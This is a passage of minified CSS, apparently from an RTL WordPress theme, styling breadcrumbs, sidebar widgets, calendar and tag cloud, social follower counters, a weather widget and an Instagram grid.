text-align: center; } .breadcrumb-inner { overflow: hidden; max-width: 100%; white-space: nowrap; text-overflow: ellipsis; } body.rtl .breadcrumb-inner { display: flex; } body.rtl .breadcrumb-inner > * { margin: 0 2px; } body.rtl .breadcrumb-inner > *:first-child { margin-right: 0; } .breadcrumb-inner .current-item, .breadcrumb-inner .last { opacity: .5; } .breadcrumb-absolute { position: absolute; top: 0; right: 0; left: 0; padding: 10px 15px; background-image: -webkit-linear-gradient(bottom, rgba(0, 0, 0, 0), rgba(0, 0, 0, .5)); background-image: linear-gradient(to top, rgba(0, 0, 0, 0) 0%, rgba(0, 0, 0, .5) 100%); } .breadcrumb-absolute .breadcrumb-inner .current-item { color: var(--absolute-light); } div.breadcrumb-absolute .breadcrumb-wrap { margin-bottom: 0; } .mc4wp-response { font-size: var(--rem-small); clear: both; margin-top: 10px; } .mc4wp-response a { font-weight: bold; text-decoration: underline; } .mc4wp-alert { color: #f8bc54; } .mc4wp-error { color: #ff3f43; } .mc4wp-notice { color: #42b8f3; } .mc4wp-success { color: #a1db9d; } .widget { position: relative; display: block; } .sidebar-inner .widget { clear: both; width: 100%; margin-bottom: 30px; } #wp-calendar { position: relative; width: 100%; margin-bottom: 7px; } #wp-calendar tfoot { position: absolute; top: 0; right: 0; left: 0; } #wp-calendar tfoot td { vertical-align: top; border: none; } #wp-calendar th, #wp-calendar td { line-height: 40px; padding: 0; text-align: center; } #wp-calendar tbody a { font-weight: 700; display: block; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; } #wp-calendar tbody td { font-size: var(--rem-small); padding: 0; } #wp-calendar td#today { font-weight: 700; } .wp-calendar-nav a { font-size: var(--em-mini); -webkit-transition: var(--effect); transition: var(--effect); color: var(--meta-fcolor); } #wp-calendar tbody a:hover, .wp-calendar-nav a:hover, #wp-calendar td#today { color: var(--g-color); } #wp-calendar caption { font-size: var(--rem-small); font-weight: 700; margin-bottom: 7px; } #wp-calendar tfoot a:hover { text-decoration: underline; } .widget_tag_cloud .tagcloud, .wp-block-tagcoloroud { display: flex; display: -webkit-flex; flex-flow: row wrap; } .tagcloud a, .wp-block-tagcoloroud a { font-size: var(--dwidgets-fsize) !important; line-height: 1; margin: 2px; padding: 7px 10px; border: 1px solid var(--flex-gray-15); border-radius: var(--round-3); } .tagcloud a:hover, .wp-block-tagcoloroud a:hover { color: var(--absolute-white) !important; background-color: var(--g-color); -webkit-box-shadow: 0 0 10px var(--cat-highlight-90, var(--g-color-90)); box-shadow: 0 0 10px var(--cat-highlight-90, var(--g-color-90)); } .widget_pages .page_item, .widget_meta li, .cat-item, .widget_archive li, .widget.widget_nav_menu .menu-item, .sidebar-menu .menu-item { position: relative; display: block; } .cat-item:first-child a { padding-top: 0; } .cat-item:last-child a { padding-bottom: 0; } .widget_archive > ul > li:last-child, .cat-item:last-child, .widget_pages > ul > li:last-child, .widget_meta > ul > li:last-child, .widget.widget_nav_menu ul.menu > li:last-child, .sidebar-menu > li:last-child { margin-bottom: 0; } .widget.widget_nav_menu li:first-child a, .sidebar-menu li:first-child a { padding-top: 0; } .cat-item .children, .widget_pages .children { margin-top: 7px; margin-right: 15px; margin-bottom: 7px; padding: 0; } .widget:not(.woocommerce) .count { font-size: var(--rem-mini); line-height: 18px; float: left; min-width: 18px; padding: 0 3px; -webkit-transition: var(--effect); transition: var(--effect); text-align: center; color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--dark-accent); } .widget_pages a, .widget_meta a, .cat-item a, .tagcloud a, .wp-block-tagcoloroud a, .widget_archive a, .widget.widget_nav_menu a, .copyright-menu a, .woocommerce-widget-layered-nav-list li, .sidebar-menu a { font-family: var(--dwidgets-family); font-size: var(--dwidgets-fsize); font-weight: var(--dwidgets-fweight); font-style: var(--dwidgets-fstyle); position: relative; display: block; padding-top: 5px; padding-bottom: 5px; -webkit-transition: var(--effect); transition: var(--effect); letter-spacing: var(--dwidgets-fspace); text-transform: var(--dwidgets-transform); color: inherit; } .widget_pages a:hover, .widget_meta a:hover, .cat-item a:hover, .widget_archive a:hover, .widget.widget_nav_menu a:hover, .copyright-menu a:hover, .sidebar-menu a:hover { color: var(--g-color); } .cat-item a:hover .count, .widget_archive a:hover .count { background-color: var(--g-color); } .widget_archive select, .widget_categories select { display: block; width: 100%; max-width: 100%; padding-right: 10px; } .widget_recent_comments .recentcomments { position: relative; margin-bottom: 20px; } .widget_recent_comments .recentcomments > a:last-child { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); display: block; margin-top: 2px; margin-bottom: 0; } .widget_recent_entries li { font-family: var(--h5-family); font-size: var(--h5-fsize); font-weight: var(--h5-fweight); position: relative; display: block; margin-bottom: 15px; letter-spacing: var(--h5-fspace); } .widget_recent_entries li:before { font-family: 'ruby-icon'; font-size: 8px; font-weight: normal; display: inline; margin-left: .4em; content: '\e900'; -webkit-transition: var(--effect); transition: var(--effect); vertical-align: middle; border-radius: var(--round-3); } .widget_recent_entries li:hover:before { text-decoration: none; color: var(--g-color); background-color: currentColor; } .widget_recent_entries a, .recentcomments a, a.rsswidget { position: relative; -webkit-transition: var(--effect); transition: var(--effect); } .widget_recent_entries li:hover a, .recentcomments a:hover, a.rsswidget:hover { color: var(--g-color); } .widget_rss .widget-heading { display: flex; display: -webkit-flex; align-items: center; } .rss-widget-icon { display: none; } .widget_rss li { margin-bottom: 12px; padding-bottom: 12px; border-bottom: 1px dashed var(--flex-gray-15); } .widget_rss li:last-child { margin-bottom: 0; } .widget_rss ul a.rsswidget:before { font-family: 'ruby-icon'; font-size: var(--em-mini); position: relative; margin-left: 7px; content: '\42'; } .widget_rss ul a.rsswidget { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); display: block; letter-spacing: var(--h4-fspace); } .rss-date { display: block; margin-top: 7px; } .rssSummary { font-size: var(--rem-small); display: block; margin-top: 12px; } .widget_rss cite { display: block; margin-top: 12px; } .widget_recent_comments > ul > .recentcomments:last-child, .widget_recent_entries > ul > li:last-child, .widget_rss > ul > li:last-child { margin-bottom: 0; padding-bottom: 0; border-bottom: none !important; } .textwidget br, .textwidget p { margin-bottom: 1rem; } .sidebar-inner { top: 0; } .sidebar-inner .widget { overflow: inherit; } .widget-heading.h4:after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; content: ''; -webkit-transform: skewX(15deg); transform: skewX(15deg); border-right: 3px solid var(--heading-sub-color); border-left: 3px solid var(--heading-sub-color); } .widget-heading.h4 { line-height: 1.1; position: relative; display: inline-block; padding: 0 15px; } .social-follower { display: flex; display: -webkit-flex; flex-wrap: wrap; } .follower-el { position: relative; } .is-style-15 .social-follower, .is-style-14 .social-follower, .is-style-8 .social-follower, .is-style-7 .social-follower, .is-style-6 .social-follower, .is-style-5 .social-follower, .is-style-4 .social-follower, .is-style-3 { margin: -5px; } .is-style-9 .social-follower, .is-style-2 .social-follower, .is-style-1 { margin: -10px; } .fncount-wrap:not(.is-style-10):not(.is-style-11):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el { position: relative; flex: 0 0 25%; max-width: 25%; } .is-style-15 .follower-el, .is-style-14 .follower-el, .is-style-13 .follower-el, .is-style-12 .follower-el, .is-style-8 .follower-el, .is-style-7 .follower-el, .is-style-6 .follower-el, .is-style-5 .follower-el, .is-style-4 .follower-el, .is-style-3 .follower-el { -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); } .fncount-wrap.is-style-14 .follower-el, .fncount-wrap.is-style-15 .follower-el { position: relative; flex: 0 0 50%; max-width: 50%; } .is-style-10 .follower-el, .is-style-11 .follower-el { flex: 0 0 100%; flex-grow: 1; max-width: 100%; margin-bottom: 15px; } .is-style-12 .follower-el, .is-style-13 .follower-el { flex: 0 0 100%; flex-grow: 1; max-width: 100%; margin-bottom: 10px; } .is-style-10 .fnicon, .is-style-11 .fnicon { margin-left: 8px; } .is-style-12 .fnicon, .is-style-13 .fnicon { font-size: 1.25em; margin-left: 8px; } .is-style-10 .fntotal, .is-style-11 .fntotal, .is-style-12 .fntotal, .is-style-13 .fntotal, .is-style-14 .fntotal, .is-style-15 .fntotal, .is-style-10 .fnlabel, .is-style-11 .fnlabel, .is-style-12 .fnlabel, .is-style-13 .fnlabel, .is-style-14 .fnlabel, .is-style-15 .fnlabel { margin-top: 0; margin-right: 3px; } .is-style-10 .fntotal + .fnlabel, .is-style-11 .fntotal + .fnlabel, .is-style-12 .fntotal + .fnlabel, .is-style-13 .fntotal + .fnlabel { font-size: .7em; margin-top: -4px; } .is-style-10 .follower-el:last-child, .is-style-11 .follower-el:last-child, .is-style-12 .follower-el:last-child, .is-style-13 .follower-el:last-child { margin-bottom: 0; } .effect-fadeout.activated .follower-el { opacity: .3; } .effect-fadeout.activated .follower-el:hover, .effect-fadeout.activated .follower-el:focus { opacity: 1; } .follower-el a { position: absolute; z-index: 99; top: 0; right: 0; width: 100%; height: 100%; } .follower-inner { font-size: 1rem; display: flex; align-items: center; flex: 1; flex-direction: column; } .is-style-9 .follower-inner, .is-style-2 .follower-inner, .is-style-1 .follower-inner { margin: 10px; } .is-style-10 .follower-inner, .is-style-11 .follower-inner, .is-style-12 .follower-inner, .is-style-13 .follower-inner { align-items: center; flex-flow: row nowrap; } .is-style-12 .follower-inner, .is-style-13 .follower-inner { position: relative; overflow: hidden; padding: 10px 20px; -webkit-transition: var(--effect); transition: var(--effect); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .is-style-12 .follower-inner { border: 1px solid var(--flex-gray-15); } .is-style-14 .follower-inner, .is-style-15 .follower-inner { display: grid; margin: 5px; padding: 12px 7px; -webkit-transition: var(--effect); transition: var(--effect); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); grid-template-columns: 42px auto 1fr; grid-gap: 0; } .fntotal, .fnlabel { line-height: 1.3; margin-top: 7px; white-space: nowrap; } .text-count { font-family: var(--meta-family); font-size: var(--em-small); font-weight: var(--meta-fweight); line-height: 1.5; -webkit-transition: var(--effect); transition: var(--effect); white-space: nowrap; letter-spacing: var(--meta-fspace); color: var(--meta-fcolor); } .fnicon { font-size: 1.75em; line-height: 1; } .fnicon i { font-size: inherit; line-height: 1; text-shadow: -3px 3px 0 #ffffff10, -4px 2px 0 #00000020; } .is-style-1 .fnicon i, .is-style-2 .fnicon i, .is-style-9 .fnicon i, .is-style-10 .fnicon i, .is-style-11 .fnicon i { position: relative; display: flex; align-items: center; justify-content: center; -webkit-transition: var(--effect); transition: var(--effect); } .light-scheme .follower-el:not(:hover) .is-style-2 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-2 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-3 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-3 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-6 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-6 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-7 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-7 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-9 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-9 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-10 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-10 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-12 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-12 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-15 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-15 .fnicon i { text-shadow: -3px 3px 0 #ffffff10, -4px 2px 0 #ffffff20; } .is-style-10 .fnicon i, .is-style-11 .fnicon i { position: relative; width: 48px; height: 48px; } .is-style-1 .fnicon i, .is-style-2 .fnicon i, .is-style-10 .fnicon i, .is-style-11 .fnicon i { -webkit-border-radius: 50%; border-radius: 50%; } .is-style-1 .fnicon i, .is-style-11 .fnicon i { color: #fff; } .is-style-1 .fnicon i, .is-style-2 .fnicon i, .is-style-9 .fnicon i { width: 58px; height: 58px; } .is-style-9 .follower-el:not(:hover) i:after { position: absolute; z-index: 9; top: 0; right: 0; width: 100%; height: 100%; content: ''; opacity: .15; border: 5px solid var(--g-color); } .is-style-9 .follower-el:not(:hover) i:after, .is-style-9 .follower-el i { -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .is-style-12 .text-count, .is-style-13 .text-count { margin-right: auto; } .is-style-12 .follower-inner > :nth-child(2), .is-style-13 .follower-inner > :nth-child(2) { position: relative; margin-top: 0; padding-right: 10px; } .is-style-12 .follower-inner > :nth-child(2):before, .is-style-13 .follower-inner > :nth-child(2):before { position: absolute; top: 50%; right: 0; width: 1px; height: 12px; margin-top: -6px; content: ''; } .is-style-12 .fntotal:before, .is-style-12 .fnlabel:before { background-color: var(--flex-gray-15); } .is-style-13 .fntotal:before, .is-style-13 .fnlabel:before { background-color: rgba(255, 255, 255, .5); } .is-style-14 .follower-inner, .is-style-15 .follower-inner { font-size: .9em; } .is-style-14 .fnicon, .is-style-15 .fnicon { height: 100%; text-align: center; grid-row: 1 / 3; } .is-style-14 .text-count, .is-style-15 .text-count { line-height: 1; margin-top: 7px; margin-right: 4px; grid-column: 2 / span 3; grid-row: 2; } .is-style-14 .fnicon i, .is-style-15 .fnicon i { display: flex; align-items: center; justify-content: center; height: 100%; justify-items: center; } .is-style-10 .text-count, .is-style-11 .text-count { margin-top: 0; margin-right: auto; -webkit-transition: var(--effect); transition: var(--effect); } .is-style-1 .fnicon, .is-style-2 .fnicon, .is-style-9 .fnicon, .is-style-10 .fnicon, .is-style-11 .fnicon { -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); } .is-style-8 .follower-inner, .is-style-7 .follower-inner, .is-style-6 .follower-inner, .is-style-5 .follower-inner, .is-style-4 .follower-inner, .is-style-3 .follower-inner { margin: 5px; padding: 15px; -webkit-transition: var(--effect); transition: var(--effect); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .is-style-7 .follower-el .follower-inner, .is-style-4 .follower-inner { -webkit-box-shadow: 0 0 10px var(--shadow-7); box-shadow: 0 0 10px var(--shadow-7); } .is-style-14 .follower-inner > *, .is-style-13 .follower-inner > *, .is-style-8 .follower-inner > *, .is-style-5 .follower-inner > * { color: #fff; } .is-style-15 .follower-inner, .is-style-6 .follower-inner, .is-style-3 .follower-inner, .is-style-2 .fnicon i, .is-style-10 .fnicon i { border: 1px solid var(--flex-gray-15); } .is-style-8 .follower-el .text-count, .is-style-7 .follower-el .text-count, .is-style-6 .follower-el .text-count { display: none; } .is-style-14 .bg-facebook .follower-inner, .is-style-13 .bg-facebook .follower-inner, .is-style-11 .bg-facebook i, .is-style-8 .bg-facebook .follower-inner, .is-style-5 .bg-facebook .follower-inner, .is-style-1 .rbi-facebook { background-color: #89abfc; } .is-style-14 .bg-twitter .follower-inner, .is-style-13 .bg-twitter .follower-inner, .is-style-11 .bg-twitter i, .is-style-8 .bg-twitter .follower-inner, .is-style-5 .bg-twitter .follower-inner, .is-style-1 .rbi-twitter { background-color: #60d2f5; } .is-style-14 .bg-pinterest .follower-inner, .is-style-13 .bg-pinterest .follower-inner, .is-style-11 .bg-pinterest i, .is-style-8 .bg-pinterest .follower-inner, .is-style-5 .bg-pinterest .follower-inner, .is-style-1 .rbi-pinterest { background-color: #f74c53; } .is-style-14 .bg-instagram .follower-inner, .is-style-13 .bg-instagram .follower-inner, .is-style-11 .bg-instagram i, .is-style-8 .bg-instagram .follower-inner, .is-style-5 .bg-instagram .follower-inner, .is-style-1 .rbi-instagram { background-color: #7e40b6; } .is-style-14 .bg-youtube .follower-inner, .is-style-13 .bg-youtube .follower-inner, .is-style-11 .bg-youtube i, .is-style-8 .bg-youtube .follower-inner, .is-style-5 .bg-youtube .follower-inner, .is-style-1 .rbi-youtube { background-color: #ef464b; } .is-style-14 .bg-telegram .follower-inner, .is-style-13 .bg-telegram .follower-inner, .is-style-11 .bg-telegram i, .is-style-8 .bg-telegram .follower-inner, .is-style-5 .bg-telegram .follower-inner, .is-style-1 .rbi-telegram { background-color: #89abfc; } .is-style-14 .bg-vimeo .follower-inner, .is-style-13 .bg-vimeo .follower-inner, .is-style-11 .bg-vimeo i, .is-style-8 .bg-vimeo .follower-inner, .is-style-5 .bg-vimeo .follower-inner, .is-style-1 .rbi-vimeo { background-color: #44bbe1; } .is-style-14 .bg-dribbble .follower-inner, .is-style-13 .bg-dribbble .follower-inner, .is-style-11 .bg-dribbble i, .is-style-8 .bg-dribbble .follower-inner, .is-style-5 .bg-dribbble .follower-inner, .is-style-1 .rbi-dribbble { background-color: #fb70a6; } .is-style-14 .bg-soundcloud .follower-inner, .is-style-13 .bg-soundcloud .follower-inner, .is-style-11 .bg-soundcloud i, .is-style-8 .bg-soundcloud .follower-inner, .is-style-5 .bg-soundcloud .follower-inner, .is-style-1 .rbi-soundcloud { background-color: #fd794a; } .is-style-15 .rbi-facebook, .is-style-12 .rbi-facebook, .is-style-10 .rbi-facebook, .is-style-9 .rbi-facebook, .is-style-7 .rbi-facebook, .is-style-6 .rbi-facebook, .is-style-4 .rbi-facebook, .is-style-3 .rbi-facebook, .is-style-2 .rbi-facebook { color: #89abfc; } .is-style-15 .rbi-twitter, .is-style-12 .rbi-twitter, .is-style-10 .rbi-twitter, .is-style-9 .rbi-twitter, .is-style-7 .rbi-twitter, .is-style-6 .rbi-twitter, .is-style-4 .rbi-twitter, .is-style-3 .rbi-twitter, .is-style-2 .rbi-twitter { color: #60d2f5; } .is-style-15 .rbi-pinterest, .is-style-12 .rbi-pinterest, .is-style-10 .rbi-pinterest, .is-style-9 .rbi-pinterest, .is-style-7 .rbi-pinterest, .is-style-6 .rbi-pinterest, .is-style-4 .rbi-pinterest, .is-style-3 .rbi-pinterest, .is-style-2 .rbi-pinterest { color: #f74c53; } .is-style-15 .rbi-instagram, .is-style-12 .rbi-instagram, .is-style-10 .rbi-instagram, .is-style-9 .rbi-instagram, .is-style-7 .rbi-instagram, .is-style-6 .rbi-instagram, .is-style-4 .rbi-instagram, .is-style-3 .rbi-instagram, .is-style-2 .rbi-instagram { color: #7e40b6; } .is-style-15 .rbi-youtube, .is-style-12 .rbi-youtube, .is-style-10 .rbi-youtube, .is-style-9 .rbi-youtube, .is-style-7 .rbi-youtube, .is-style-6 .rbi-youtube, .is-style-4 .rbi-youtube, .is-style-3 .rbi-youtube, .is-style-2 .rbi-youtube { color: #ef464b; } .is-style-15 .rbi-telegram, .is-style-12 .rbi-telegram, .is-style-10 .rbi-telegram, .is-style-9 .rbi-telegram, .is-style-7 .rbi-telegram, .is-style-6 .rbi-telegram, .is-style-4 .rbi-telegram, .is-style-3 .rbi-telegram, .is-style-2 .rbi-telegram { color: #89abfc; } .is-style-15 .rbi-vimeo, .is-style-12 .rbi-vimeo, .is-style-10 .rbi-vimeo, .is-style-9 .rbi-vimeo, .is-style-7 .rbi-vimeo, .is-style-6 .rbi-vimeo, .is-style-4 .rbi-vimeo, .is-style-3 .rbi-vimeo, .is-style-2 .rbi-vimeo { color: #44bbe1; } .is-style-15 .rbi-dribbble, .is-style-12 .rbi-dribbble, .is-style-10 .rbi-dribbble, .is-style-9 .rbi-dribbble, .is-style-7 .rbi-dribbble, .is-style-6 .rbi-dribbble, .is-style-4 .rbi-dribbble, .is-style-3 .rbi-dribbble, .is-style-2 .rbi-dribbble { color: #fb70a6; } .is-style-15 .rbi-soundcloud, .is-style-12 .rbi-soundcloud, .is-style-10 .rbi-soundcloud, .is-style-9 .rbi-soundcloud, .is-style-7 .rbi-soundcloud, .is-style-6 .rbi-soundcloud, .is-style-4 .rbi-soundcloud, .is-style-3 .rbi-soundcloud, .is-style-2 .rbi-soundcloud { color: #fd794a; } .is-style-1 .follower-el:hover .fnicon, .is-style-2 .follower-el:hover .fnicon, .is-style-9 .follower-el:hover .fnicon, .is-style-10 .follower-el:hover .fnicon, .is-style-11 .follower-el:hover .fnicon { -webkit-transform: translate3d(0, -5px, 0); transform: translate3d(0, -5px, 0); } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-facebook:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-facebook { color: #fff; border-color: #1f82ec; background-color: #1f82ec; box-shadow: 0 5px 15px #1f82ec; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-twitter:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-twitter { color: #fff; border-color: #13b9ee; background-color: #13b9ee; box-shadow: 0 5px 15px #13b9ee; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-pinterest:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-pinterest { color: #fff; border-color: #f60c19; background-color: #f60c19; box-shadow: 0 5px 15px #f60c19; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-instagram:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-instagram { color: #fff; border-color: #8823b6; background-color: #8823b6; box-shadow: 0 5px 15px #8823b6; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-youtube:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-youtube { color: #fff; border-color: #fc161e; background-color: #fc161e; box-shadow: 0 5px 15px #fc161e; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-soundcloud:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-soundcloud { color: #fff; border-color: #ff5313; background-color: #ff5313; box-shadow: 0 5px 15px #ff5313; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-telegram:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-telegram { color: #fff; border-color: #3885d9; background-color: #3885d9; box-shadow: 0 5px 15px #3885d9; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-vimeo:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-vimeo { color: #fff; border-color: #16b1e3; background-color: #16b1e3; box-shadow: 0 5px 15px #16b1e3; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-dribbble:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-dribbble { color: #fff; border-color: #ff407f; background-color: #ff407f; box-shadow: 0 5px 15px #ff407f; } .is-style-15 .follower-el:hover, .is-style-14 .follower-el:hover, .is-style-13 .follower-el:hover, .is-style-12 .follower-el:hover, .is-style-8 .follower-el:hover, .is-style-7 .follower-el:hover, .is-style-6 .follower-el:hover, .is-style-5 .follower-el:hover, .is-style-4 .follower-el:hover, .is-style-3 .follower-el:hover { -webkit-transform: translate3d(0, -3px, 0); transform: translate3d(0, -3px, 0); } .is-style-15 .follower-el:hover i, .is-style-15 .follower-el:hover .text-count, .is-style-12 .follower-el:hover i, .is-style-12 .follower-el:hover .text-count, .is-style-7 .follower-el:hover i, .is-style-7 .follower-el:hover .text-count, .is-style-6 .follower-el:hover i, .is-style-6 .follower-el:hover .text-count, .is-style-4 .follower-el:hover i, .is-style-4 .follower-el:hover .text-count, .is-style-3 .follower-el:hover i, .is-style-3 .follower-el:hover .text-count { color: #fff; } .is-style-12 .follower-el:hover .fntotal:before, .is-style-12 .follower-el:hover .fnlabel:before { background-color: rgba(255, 255, 255, .5); -webkit-backface-visibility: hidden; backface-visibility: hidden; } .rb-weather-wrap { padding: 20px; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .rb-w-title.h4 { line-height: 1.1; display: inline-block; width: auto; margin-bottom: 15px; padding: 4px 20px; color: #fff; -webkit-border-radius: var(--round-3); border-radius: var(--round-3); background: var(--g-color); } .rb-w-stats { display: flex; display: -webkit-flex; align-items: flex-start; flex: 0 0 100%; flex-flow: row nowrap; flex-basis: 100%; width: 100%; max-width: 100%; margin-top: 10px; margin-bottom: 25px; } .rb-w-stats > *, .rb-w-header > * { width: 50%; } .rb-w-stats .col-left { position: relative; height: 100%; text-align: center; } .rb-w-header .rb-w-big-icon { display: flex; display: -webkit-flex; justify-content: center; } .rb-w-header { display: flex; display: -webkit-flex; align-items: center; flex: 0 0 100%; flex-flow: row nowrap; flex-basis: 100%; width: 100%; max-width: 100%; } .rb-header-name.h6 { font-size: 2rem; line-height: 1; overflow: hidden; white-space: nowrap; letter-spacing: .03rem; text-overflow: ellipsis; } .rb-w-desc { font-size: .84rem; margin-top: 5px; letter-spacing: .03rem; text-transform: capitalize; color: #aaa; } .rb-w-stats > *, .rb-w-header > * { padding: 0 6px; } .rb-w-stats .col-right > * { font-size: .86rem; line-height: 1; display: grid; max-width: 100%; margin-top: 3px; grid-template-columns: auto auto auto auto 1fr; grid-gap: 0; } .rb-w-big-icon svg { width: 86px; height: 86px; } .rb-w-stats .col-right .rb-weather-highlow > :nth-child(3) { margin-right: 10px; margin-left: 3px; text-align: center; } .rb-weather-highlow sup { top: -.3em; } .rb-w-header .col-right .rb-w-units { font-size: 4rem; font-weight: 700; line-height: 1; } .rb-w-units .icon-thermometer { position: absolute; top: -14px; right: -28px; } .rb-weather-highlow svg { display: flex; width: 21px; } .rb-weather-highlow > *:not(:first-child), .rb-w-humidity > *:not(:first-child), .ruby-weather-wind > *:not(:first-child) { display: flex; align-items: center; } .rb-weather-highlow > :nth-child(4) { margin-right: 0; } span.ruby-degrees > :first-child { font-size: 18px; line-height: 1; position: absolute; top: 14px; right: 4px; height: 22px; vertical-align: text-top; } span.ruby-degrees { position: relative; height: 100%; padding-right: 13px; } .w-forecast-wrap { display: flex; display: -webkit-flex; overflow: hidden; flex-flow: row nowrap; justify-content: space-between; max-width: 100%; margin-right: auto; margin-left: auto; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .w-forecast-wrap svg:not(.svg-cloudy):not(.svg-day-cloudy):not(.svg-night-cloudy) g path { stroke: #bbb; fill: #bbb; } .w-forecast-wrap svg.svg-icon.svg-day-cloudy g:nth-child(2) path { stroke: #bbb; fill: #bbb; } .w-forecast-day.h6 { font-size: .7rem; line-height: 18px; display: inline-block; width: 100%; white-space: nowrap; letter-spacing: .03rem; color: #fff; -webkit-border-radius: var(--round-3); border-radius: var(--round-3); background-color: var(--flex-gray-20); } .w-forecast-day { padding: 0 4px; text-align: center; } .w-forecast-icon { display: flex; display: -webkit-flex; justify-content: center; } .w-forecast-icon svg { width: 40px; height: 40px; margin-bottom: -3px; } .w-forecast-icon svg.svg-day-sunny { padding: 4px; } .w-forecast-temp { font-size: var(--rem-small); font-weight: 600; line-height: 1; position: relative; display: inline-flex; } .w-forecast-temp sup { font-size: 62%; position: absolute; top: auto; right: 100%; bottom: 94%; } .forecast-day-1 { flex: 0 0 100%; width: 100%; } .forecast-day-2 { flex: 0 0 50%; width: 50%; } .forecast-day-3 { flex: 0 0 33.33%; width: 33.33%; } .forecast-day-4 { flex: 0 0 25%; width: 25%; } .forecast-day-5 { flex: 0 0 20%; width: 20%; } .top-footer-inner .instagram-grid.is-wide { margin-right: -20px; margin-left: -20px; } .instagram-grid.is-wide { padding: 10px; } .grid-el { overflow: hidden; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); justify-self: stretch; } .grid-header { font-size: 1.25rem; display: block; margin-bottom: 20px; text-align: center; } .w-fw-footer.widget-instagram .rb-error { margin-bottom: 20px; text-align: center; } .instagram-box a { position: absolute; z-index: 1; top: 0; right: 0; bottom: 0; left: 0; display: block; } .instagram-box { position: relative; overflow: hidden; flex: 1; height: 100%; padding-bottom: 100%; } .instagram-box img, .instagram-box video { position: absolute; top: 0; right: 0; width: 100%; height: 100%; object-fit: cover; 